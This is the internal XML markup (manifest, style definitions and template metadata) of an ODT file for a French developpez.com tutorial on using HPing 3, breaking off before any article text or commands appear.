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020000000205C9807F8.png" manifest:media-type=""/>
  <manifest:file-entry manifest:full-path="Pictures/100002010000002000000020D031CE58.png" manifest:media-type=""/>
  <manifest:file-entry manifest:full-path="Pictures/100002010000002000000020A90AD953.png" manifest:media-type=""/>
  <manifest:file-entry manifest:full-path="Pictures/100002000000009D00000023A061FB04.gif"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images/Bitmaps/sc_userimages.png" manifest:media-type=""/>
  <manifest:file-entry manifest:full-path="Configurations2/images/sc_imagelis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Ubuntu" svg:font-family="Ubuntu" style:font-family-generic="swiss"/>
    <style:font-face style:name="Courier New" svg:font-family="'Courier New'" style:font-adornments="Normal"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Courier New1" svg:font-family="'Courier New'" style:font-adornments="Normal"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dvp_5f_tab_5f_synopsis" style:display-name="dvp_tab_synopsis" style:family="table">
      <style:table-properties style:width="16cm" fo:margin-top="0cm" fo:margin-bottom="0cm" table:align="center" fo:background-color="#ccffff">
        <style:background-image/>
      </style:table-properties>
    </style:style>
    <style:style style:name="dvp_5f_tab_5f_synopsis.A" style:display-name="dvp_tab_synopsis.A" style:family="table-column">
      <style:table-column-properties style:column-width="16cm"/>
    </style:style>
    <style:style style:name="dvp_5f_tab_5f_synopsis.A1" style:display-name="dvp_tab_synopsis.A1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.499cm" fo:border="0.05pt solid #0099ff"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_1" style:display-name="dvp_code_shell_1" style:family="table">
      <style:table-properties style:width="15.3cm" style:rel-width="90%" fo:margin-top="0.4cm" fo:margin-bottom="0.4cm" table:align="center"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_1.A" style:display-name="dvp_code_shell_1.A" style:family="table-column">
      <style:table-column-properties style:column-width="2.551cm" style:rel-column-width="10922*"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_1.F" style:display-name="dvp_code_shell_1.F" style:family="table-column">
      <style:table-column-properties style:column-width="2.551cm" style:rel-column-width="10925*"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_1.1" style:display-name="dvp_code_shell_1.1" style:family="table-row">
      <style:table-row-properties fo:background-color="#e6e6ff">
        <style:background-image/>
      </style:table-row-properties>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_1.A1" style:display-name="dvp_code_shell_1.A1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border-left="0.05pt solid #000000" fo:border-right="none" fo:border-top="0.05pt solid #000000" fo:border-bottom="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_1.F1" style:display-name="dvp_code_shell_1.F1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_1.2" style:display-name="dvp_code_shell_1.2" style:family="table-row">
      <style:table-row-properties fo:background-color="#ffffcc">
        <style:background-image/>
      </style:table-row-properties>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_1.A2" style:display-name="dvp_code_shell_1.A2" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border-left="0.05pt solid #000000" fo:border-right="0.05pt solid #000000" fo:border-top="none" fo:border-bottom="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_2" style:display-name="dvp_code_shell_2" style:family="table">
      <style:table-properties style:width="15.3cm" style:rel-width="90%" fo:margin-top="0.4cm" fo:margin-bottom="0.4cm" table:align="center"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_2.A" style:display-name="dvp_code_shell_2.A" style:family="table-column">
      <style:table-column-properties style:column-width="2.551cm" style:rel-column-width="10922*"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_2.F" style:display-name="dvp_code_shell_2.F" style:family="table-column">
      <style:table-column-properties style:column-width="2.551cm" style:rel-column-width="10925*"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_2.1" style:display-name="dvp_code_shell_2.1" style:family="table-row">
      <style:table-row-properties fo:background-color="#e6e6ff">
        <style:background-image/>
      </style:table-row-properties>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_2.A1" style:display-name="dvp_code_shell_2.A1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border-left="0.05pt solid #000000" fo:border-right="none" fo:border-top="0.05pt solid #000000" fo:border-bottom="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_2.F1" style:display-name="dvp_code_shell_2.F1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_2.2" style:display-name="dvp_code_shell_2.2" style:family="table-row">
      <style:table-row-properties fo:background-color="#ffffcc">
        <style:background-image/>
      </style:table-row-properties>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_2.A2" style:display-name="dvp_code_shell_2.A2" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border-left="0.05pt solid #000000" fo:border-right="0.05pt solid #000000" fo:border-top="none" fo:border-bottom="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_idea_5f_1" style:display-name="dvp_idea_1" style:family="table">
      <style:table-properties style:width="15.3cm" style:rel-width="90%" fo:margin-top="0.4cm" fo:margin-bottom="0.4cm" table:align="center"/>
    </style:style>
    <style:style style:name="dvp_5f_idea_5f_1.A" style:display-name="dvp_idea_1.A" style:family="table-column">
      <style:table-column-properties style:column-width="7.65cm" style:rel-column-width="32767*"/>
    </style:style>
    <style:style style:name="dvp_5f_idea_5f_1.A1" style:display-name="dvp_idea_1.A1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border-left="0.05pt solid #000000" fo:border-right="none" fo:border-top="0.05pt solid #000000" fo:border-bottom="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_idea_5f_1.B1" style:display-name="dvp_idea_1.B1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_4" style:display-name="dvp_code_shell_4" style:family="table">
      <style:table-properties style:width="15.3cm" style:rel-width="90%" fo:margin-top="0.4cm" fo:margin-bottom="0.4cm" table:align="center"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_4.A" style:display-name="dvp_code_shell_4.A" style:family="table-column">
      <style:table-column-properties style:column-width="2.551cm" style:rel-column-width="10922*"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_4.F" style:display-name="dvp_code_shell_4.F" style:family="table-column">
      <style:table-column-properties style:column-width="2.551cm" style:rel-column-width="10925*"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_4.1" style:display-name="dvp_code_shell_4.1" style:family="table-row">
      <style:table-row-properties fo:background-color="#e6e6ff">
        <style:background-image/>
      </style:table-row-properties>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_4.A1" style:display-name="dvp_code_shell_4.A1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border-left="0.05pt solid #000000" fo:border-right="none" fo:border-top="0.05pt solid #000000" fo:border-bottom="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_4.F1" style:display-name="dvp_code_shell_4.F1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_4.2" style:display-name="dvp_code_shell_4.2" style:family="table-row">
      <style:table-row-properties fo:background-color="#ffffcc">
        <style:background-image/>
      </style:table-row-properties>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_4.A2" style:display-name="dvp_code_shell_4.A2" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border-left="0.05pt solid #000000" fo:border-right="0.05pt solid #000000" fo:border-top="none" fo:border-bottom="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_3" style:display-name="dvp_code_shell_3" style:family="table">
      <style:table-properties style:width="15.3cm" style:rel-width="90%" fo:margin-top="0.4cm" fo:margin-bottom="0.4cm" table:align="center"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_3.A" style:display-name="dvp_code_shell_3.A" style:family="table-column">
      <style:table-column-properties style:column-width="2.551cm" style:rel-column-width="10922*"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_3.F" style:display-name="dvp_code_shell_3.F" style:family="table-column">
      <style:table-column-properties style:column-width="2.551cm" style:rel-column-width="10925*"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_3.1" style:display-name="dvp_code_shell_3.1" style:family="table-row">
      <style:table-row-properties fo:background-color="#e6e6ff">
        <style:background-image/>
      </style:table-row-properties>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_3.A1" style:display-name="dvp_code_shell_3.A1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border-left="0.05pt solid #000000" fo:border-right="none" fo:border-top="0.05pt solid #000000" fo:border-bottom="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_3.F1" style:display-name="dvp_code_shell_3.F1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_3.2" style:display-name="dvp_code_shell_3.2" style:family="table-row">
      <style:table-row-properties fo:background-color="#ffffcc">
        <style:background-image/>
      </style:table-row-properties>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_3.A2" style:display-name="dvp_code_shell_3.A2" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border-left="0.05pt solid #000000" fo:border-right="0.05pt solid #000000" fo:border-top="none" fo:border-bottom="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_info_5f_1" style:display-name="dvp_info_1" style:family="table">
      <style:table-properties style:width="15.3cm" style:rel-width="90%" fo:margin-top="0.4cm" fo:margin-bottom="0.4cm" table:align="center"/>
    </style:style>
    <style:style style:name="dvp_5f_info_5f_1.A" style:display-name="dvp_info_1.A" style:family="table-column">
      <style:table-column-properties style:column-width="7.65cm" style:rel-column-width="32767*"/>
    </style:style>
    <style:style style:name="dvp_5f_info_5f_1.A1" style:display-name="dvp_info_1.A1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border-left="0.05pt solid #000000" fo:border-right="none" fo:border-top="0.05pt solid #000000" fo:border-bottom="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_info_5f_1.B1" style:display-name="dvp_info_1.B1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_5" style:display-name="dvp_code_shell_5" style:family="table">
      <style:table-properties style:width="15.3cm" style:rel-width="90%" fo:margin-top="0.4cm" fo:margin-bottom="0.4cm" table:align="center"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_5.A" style:display-name="dvp_code_shell_5.A" style:family="table-column">
      <style:table-column-properties style:column-width="2.551cm" style:rel-column-width="10922*"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_5.F" style:display-name="dvp_code_shell_5.F" style:family="table-column">
      <style:table-column-properties style:column-width="2.551cm" style:rel-column-width="10925*"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_5.1" style:display-name="dvp_code_shell_5.1" style:family="table-row">
      <style:table-row-properties fo:background-color="#e6e6ff">
        <style:background-image/>
      </style:table-row-properties>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_5.A1" style:display-name="dvp_code_shell_5.A1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border-left="0.05pt solid #000000" fo:border-right="none" fo:border-top="0.05pt solid #000000" fo:border-bottom="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_5.F1" style:display-name="dvp_code_shell_5.F1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_5.2" style:display-name="dvp_code_shell_5.2" style:family="table-row">
      <style:table-row-properties fo:background-color="#ffffcc">
        <style:background-image/>
      </style:table-row-properties>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_shell_5f_5.A2" style:display-name="dvp_code_shell_5.A2" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border-left="0.05pt solid #000000" fo:border-right="0.05pt solid #000000" fo:border-top="none" fo:border-bottom="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_warning_5f_1" style:display-name="dvp_warning_1" style:family="table">
      <style:table-properties style:width="15.3cm" style:rel-width="90%" fo:margin-top="0.4cm" fo:margin-bottom="0.4cm" table:align="center"/>
    </style:style>
    <style:style style:name="dvp_5f_warning_5f_1.A" style:display-name="dvp_warning_1.A" style:family="table-column">
      <style:table-column-properties style:column-width="7.65cm" style:rel-column-width="32767*"/>
    </style:style>
    <style:style style:name="dvp_5f_warning_5f_1.A1" style:display-name="dvp_warning_1.A1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border-left="0.05pt solid #000000" fo:border-right="none" fo:border-top="0.05pt solid #000000" fo:border-bottom="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="dvp_5f_warning_5f_1.B1" style:display-name="dvp_warning_1.B1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.097cm" fo:border="0.05pt solid #000000"/>
    </style:style>
    <style:style style:name="P1" style:family="paragraph" style:parent-style-name="Header">
      <style:paragraph-properties fo:text-align="center" style:justify-single-word="false"/>
    </style:style>
    <style:style style:name="P2" style:family="paragraph" style:parent-style-name="Footer">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
      <style:text-properties fo:font-size="8pt" style:font-size-asian="8pt" style:font-size-complex="8pt"/>
    </style:style>
    <style:style style:name="P3" style:family="paragraph" style:parent-style-name="Footer">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false" fo:text-align="center" style:justify-single-word="false"/>
      <style:text-properties fo:font-size="8pt" style:font-size-asian="8pt" style:font-size-complex="8pt"/>
    </style:style>
    <style:style style:name="P4" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P5" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0.199cm" style:contextual-spacing="false" fo:text-align="center" style:justify-single-word="false" fo:background-color="transparent">
        <style:background-image/>
      </style:paragraph-properties>
    </style:style>
    <style:style style:name="P6" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0.199cm" style:contextual-spacing="false" fo:text-align="center" style:justify-single-word="false"/>
      <style:text-properties fo:font-size="14pt" fo:font-weight="bold" style:font-size-asian="14pt" style:font-weight-asian="bold" style:font-size-complex="14pt" style:font-weight-complex="bold"/>
    </style:style>
    <style:style style:name="P7" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:paragraph-rsid="002843af"/>
    </style:style>
    <style:style style:name="P8" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:paragraph-rsid="00325ae5"/>
    </style:style>
    <style:style style:name="P9" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:text-align="center" style:justify-single-word="false" fo:break-before="auto" fo:break-after="auto"/>
      <style:text-properties style:font-name="Verdana" fo:font-size="18pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="P10" style:family="paragraph" style:parent-style-name="Table_20_Heading">
      <style:text-properties style:font-name="Courier New1"/>
    </style:style>
    <style:style style:name="P11" style:family="paragraph" style:parent-style-name="Table_20_Contents">
      <style:text-properties style:font-name="Courier New1" officeooo:paragraph-rsid="0023929e"/>
    </style:style>
    <style:style style:name="P12" style:family="paragraph" style:parent-style-name="Table_20_Contents">
      <style:text-properties style:font-name="Courier New1" officeooo:paragraph-rsid="002d4ce3"/>
    </style:style>
    <style:style style:name="P13" style:family="paragraph" style:parent-style-name="Table_20_Contents">
      <style:text-properties fo:color="#ff0000" style:font-name="Courier New1" fo:font-style="italic"/>
    </style:style>
    <style:style style:name="P14" style:family="paragraph" style:parent-style-name="Table_20_Contents">
      <style:text-properties officeooo:paragraph-rsid="002f1703"/>
    </style:style>
    <style:style style:name="P15" style:family="paragraph" style:parent-style-name="Table_20_Contents">
      <style:text-properties officeooo:rsid="0020d6b0" officeooo:paragraph-rsid="001e6723"/>
    </style:style>
    <style:style style:name="P16" style:family="paragraph" style:parent-style-name="Table_20_Contents">
      <style:text-properties style:font-name="Courier New1" officeooo:rsid="0021b417" officeooo:paragraph-rsid="0021b417"/>
    </style:style>
    <style:style style:name="P17" style:family="paragraph" style:parent-style-name="Table_20_Contents">
      <style:text-properties officeooo:rsid="002bffd4" officeooo:paragraph-rsid="002bffd4"/>
    </style:style>
    <style:style style:name="P18" style:family="paragraph" style:parent-style-name="Table_20_Contents">
      <style:text-properties officeooo:rsid="002843af" officeooo:paragraph-rsid="002843af"/>
    </style:style>
    <style:style style:name="P19" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="001ec12b" officeooo:paragraph-rsid="001ec12b"/>
    </style:style>
    <style:style style:name="P20" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="0021b417" officeooo:paragraph-rsid="0021b417"/>
    </style:style>
    <style:style style:name="P21" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="0023929e" officeooo:paragraph-rsid="0023929e"/>
    </style:style>
    <style:style style:name="P22" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="002ab7dc" officeooo:paragraph-rsid="002ab7dc"/>
    </style:style>
    <style:style style:name="P23" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="002d1ed1" officeooo:paragraph-rsid="002d1ed1"/>
    </style:style>
    <style:style style:name="P24" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="0026b14c" officeooo:paragraph-rsid="0026b14c"/>
    </style:style>
    <style:style style:name="P25" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="002843af" officeooo:paragraph-rsid="002843af"/>
    </style:style>
    <style:style style:name="P26" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="002df26e"/>
    </style:style>
    <style:style style:name="P27" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="002df26e" officeooo:paragraph-rsid="002df26e"/>
    </style:style>
    <style:style style:name="P28" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="002e26ba" officeooo:paragraph-rsid="002e26ba"/>
    </style:style>
    <style:style style:name="P29" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="002f1703" officeooo:paragraph-rsid="002f1703"/>
    </style:style>
    <style:style style:name="P30" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="0035176e" officeooo:paragraph-rsid="0035176e"/>
    </style:style>
    <style:style style:name="P31" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="00325ae5" officeooo:paragraph-rsid="003efaea"/>
    </style:style>
    <style:style style:name="P32" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="0037e5dd" officeooo:paragraph-rsid="0037e5dd"/>
    </style:style>
    <style:style style:name="P33" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="003b80ad" officeooo:paragraph-rsid="003b80ad"/>
    </style:style>
    <style:style style:name="P34" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="003b80ad" officeooo:paragraph-rsid="003bc2ca"/>
    </style:style>
    <style:style style:name="P35" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties fo:font-weight="bold" officeooo:rsid="003b80ad" officeooo:paragraph-rsid="003b80ad" style:font-weight-asian="bold" style:font-weight-complex="bold"/>
    </style:style>
    <style:style style:name="P36" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties fo:font-weight="bold" officeooo:rsid="003d61d9" officeooo:paragraph-rsid="003d61d9" style:font-weight-asian="bold" style:font-weight-complex="bold"/>
    </style:style>
    <style:style style:name="P37" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="003bc2ca" officeooo:paragraph-rsid="003bc2ca"/>
    </style:style>
    <style:style style:name="P38" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="003d61d9" officeooo:paragraph-rsid="003d61d9"/>
    </style:style>
    <style:style style:name="P39" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties fo:font-weight="normal" officeooo:rsid="003d61d9" officeooo:paragraph-rsid="003d61d9" style:font-weight-asian="normal" style:font-weight-complex="normal"/>
    </style:style>
    <style:style style:name="P40" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties officeooo:rsid="003efaea" officeooo:paragraph-rsid="003efaea"/>
    </style:style>
    <style:style style:name="P41" style:family="paragraph" style:parent-style-name="Heading_20_2">
      <style:text-properties officeooo:rsid="0021b417"/>
    </style:style>
    <style:style style:name="P42" style:family="paragraph" style:parent-style-name="Heading_20_2">
      <style:text-properties officeooo:rsid="002df26e" officeooo:paragraph-rsid="002df26e"/>
    </style:style>
    <style:style style:name="P43" style:family="paragraph" style:parent-style-name="Heading_20_2">
      <style:text-properties officeooo:rsid="002e26ba" officeooo:paragraph-rsid="002e26ba"/>
    </style:style>
    <style:style style:name="P44" style:family="paragraph" style:parent-style-name="Heading_20_2">
      <style:text-properties officeooo:rsid="002f1703" officeooo:paragraph-rsid="003b80ad"/>
    </style:style>
    <style:style style:name="P45" style:family="paragraph" style:parent-style-name="Heading_20_2">
      <style:text-properties officeooo:rsid="0035176e" officeooo:paragraph-rsid="0035176e"/>
    </style:style>
    <style:style style:name="P46" style:family="paragraph" style:parent-style-name="Heading_20_1">
      <style:text-properties officeooo:rsid="001ec12b"/>
    </style:style>
    <style:style style:name="P47" style:family="paragraph" style:parent-style-name="Heading_20_1">
      <style:text-properties officeooo:rsid="001ec12b" officeooo:paragraph-rsid="001ec12b"/>
    </style:style>
    <style:style style:name="P48" style:family="paragraph" style:parent-style-name="Heading_20_1">
      <style:text-properties officeooo:rsid="00209ac0"/>
    </style:style>
    <style:style style:name="P49" style:family="paragraph" style:parent-style-name="Heading_20_1">
      <style:text-properties officeooo:paragraph-rsid="002df26e"/>
    </style:style>
    <style:style style:name="P50" style:family="paragraph" style:parent-style-name="Table_20_Heading">
      <style:text-properties style:font-name="Courier New1"/>
    </style:style>
    <style:style style:name="P5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e6723"/>
    </style:style>
    <style:style style:name="T2" style:family="text">
      <style:text-properties officeooo:rsid="0023929e"/>
    </style:style>
    <style:style style:name="T3" style:family="text">
      <style:text-properties officeooo:rsid="002843af"/>
    </style:style>
    <style:style style:name="T4" style:family="text">
      <style:text-properties officeooo:rsid="002ab7dc"/>
    </style:style>
    <style:style style:name="T5" style:family="text">
      <style:text-properties officeooo:rsid="002d4ce3"/>
    </style:style>
    <style:style style:name="T6" style:family="text">
      <style:text-properties officeooo:rsid="002e26ba"/>
    </style:style>
    <style:style style:name="T7" style:family="text">
      <style:text-properties officeooo:rsid="002f1703"/>
    </style:style>
    <style:style style:name="T8" style:family="text">
      <style:text-properties officeooo:rsid="00325ae5"/>
    </style:style>
    <style:style style:name="T9" style:family="text">
      <style:text-properties officeooo:rsid="0036354e"/>
    </style:style>
    <style:style style:name="T10" style:family="text">
      <style:text-properties officeooo:rsid="0037e5dd"/>
    </style:style>
    <style:style style:name="T11" style:family="text">
      <style:text-properties officeooo:rsid="0039ea5b"/>
    </style:style>
    <style:style style:name="T12" style:family="text">
      <style:text-properties officeooo:rsid="003b80ad"/>
    </style:style>
    <style:style style:name="T13" style:family="text">
      <style:text-properties fo:font-weight="bold" style:font-weight-asian="bold" style:font-weight-complex="bold"/>
    </style:style>
    <style:style style:name="T14" style:family="text">
      <style:text-properties fo:font-weight="bold" officeooo:rsid="003bc2ca" style:font-weight-asian="bold" style:font-weight-complex="bold"/>
    </style:style>
    <style:style style:name="T15" style:family="text">
      <style:text-properties fo:font-weight="normal" style:font-weight-asian="normal" style:font-weight-complex="normal"/>
    </style:style>
    <style:style style:name="T16" style:family="text">
      <style:text-properties officeooo:rsid="003bc2ca"/>
    </style:style>
    <style:style style:name="T17" style:family="text">
      <style:text-properties officeooo:rsid="003d61d9"/>
    </style:style>
    <style:style style:name="T18" style:family="text">
      <style:text-properties officeooo:rsid="003efaea"/>
    </style:style>
    <style:style style:name="T19" style:family="text">
      <style:text-properties officeooo:rsid="003f040c"/>
    </style:style>
    <style:style style:name="T20" style:family="text">
      <style:text-properties style:use-window-font-color="true" style:text-outline="false" style:text-line-through-styl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cu_miseajour"/>
        <text:user-field-decl office:value-type="string" office:string-value="2013-11-11" text:name="cu_date"/>
        <text:user-field-decl office:value-type="string" office:string-value="Neckara" text:name="cu_licauteur"/>
        <text:user-field-decl office:value-type="string" office:string-value="Neckara" text:name="cu_fullname1"/>
        <text:user-field-decl office:value-type="string" office:string-value="Neckara" text:name="cu_alias1"/>
        <text:user-field-decl office:value-type="string" office:string-value="http://www.developpez.net/forums/member.php?u=474264" text:name="cu_url1"/>
        <text:user-field-decl office:value-type="string" office:string-value="Site personnel" text:name="cu_homepagetitle1"/>
        <text:user-field-decl office:value-type="string" office:string-value="http://neckara.developpez.com/" text:name="cu_homepageurl1"/>
        <text:user-field-decl office:value-type="string" office:string-value="" text:name="cu_blog1"/>
        <text:user-field-decl office:value-type="string" office:string-value="0" text:name="cu_sautDePageAvantSection"/>
        <text:user-field-decl office:value-type="string" office:string-value="FinDocument" text:name="cu_notesBasPage"/>
        <text:user-field-decl office:value-type="string" office:string-value="0" text:name="cu_rubrique"/>
        <text:user-field-decl office:value-type="string" office:string-value="2" text:name="cu_lictype"/>
        <text:user-field-decl office:value-type="string" office:string-value="11.1" text:name="cu_version_kitooodvp"/>
        <text:user-field-decl office:value-type="string" office:string-value="Utlisation de HPing 3" text:name="cu_description"/>
        <text:user-field-decl office:value-type="string" office:string-value="HPing3" text:name="cu_keywords"/>
        <text:user-field-decl office:value-type="string" office:string-value="Utlisation de HPing 3" text:name="cu_page"/>
        <text:user-field-decl office:value-type="string" office:string-value="Utlisation de HPing 3" text:name="cu_article"/>
        <text:user-field-decl office:value-type="string" office:string-value="" text:name="cu_extratag"/>
        <text:user-field-decl office:value-type="string" office:string-value="2013" text:name="cu_licannee"/>
        <text:user-field-decl office:value-type="string" office:string-value="" text:name="cu_TopicType"/>
        <text:user-field-decl office:value-type="string" office:string-value="" text:name="cu_duree"/>
        <text:user-field-decl office:value-type="string" office:string-value="0" text:name="cu_niveau"/>
        <text:user-field-decl office:value-type="string" office:string-value="" text:name="cu_reference"/>
        <text:user-field-decl office:value-type="string" office:string-value="file:///home/neckara/Documents/" text:name="RepertoireOuverture"/>
        <text:user-field-decl office:value-type="string" office:string-value="/home/neckara/Documents/auteurs-kitooodvp.ods" text:name="cu_fichier_auteurs"/>
        <text:user-field-decl office:value-type="string" office:string-value="http://www.developpez.com/ws/badge?v=1&amp;user=474264" text:name="cu_badge1"/>
        <text:user-field-decl office:value-type="string" office:string-value="" text:name="cu_google-plus1"/>
        <text:user-field-decl office:value-type="string" office:string-value="auteur" text:name="cu_role_auteur1"/>
        <text:user-field-decl office:value-type="string" office:string-value="Perso" text:name="cu_liens1_lien1_type"/>
        <text:user-field-decl office:value-type="string" office:string-value="" text:name="cu_liens1_lien1_icone"/>
        <text:user-field-decl office:value-type="string" office:string-value="" text:name="cu_liens1_lien1_title"/>
        <text:user-field-decl office:value-type="string" office:string-value="" text:name="cu_liens1_lien1_url"/>
      </text:user-field-decls>
      <text:section text:style-name="Sect1" text:name="dvp_sec_titre">
        <text:p text:style-name="P9">Ut<text:span text:style-name="T9">i</text:span>lisation de HPing 3</text:p>
      </text:section>
      <text:section text:style-name="Sect1" text:name="dvp_sec_sous_titre">
        <text:p text:style-name="P6">Sous-titre</text:p>
      </text:section>
      <text:section text:style-name="Sect1" text:name="dvp_sec_auteur">
        <text:p text:style-name="P5">Date de publication : <text:user-field-get text:name="cu_date">2013-11-11</text:user-field-get>, date de mise à jour : <text:user-field-get text:name="cu_miseajour"/></text:p>
        <text:p text:style-name="P5">Auteur principal : <text:user-field-get text:name="cu_fullname1">Neckara</text:user-field-get></text:p>
      </text:section>
      <text:section text:style-name="Sect1" text:name="dvp_sec_synopsis">
        <table:table table:name="dvp_tab_synopsis" table:style-name="dvp_5f_tab_5f_synopsis">
          <table:table-column table:style-name="dvp_5f_tab_5f_synopsis.A"/>
          <table:table-row>
            <table:table-cell table:style-name="dvp_5f_tab_5f_synopsis.A1" office:value-type="string">
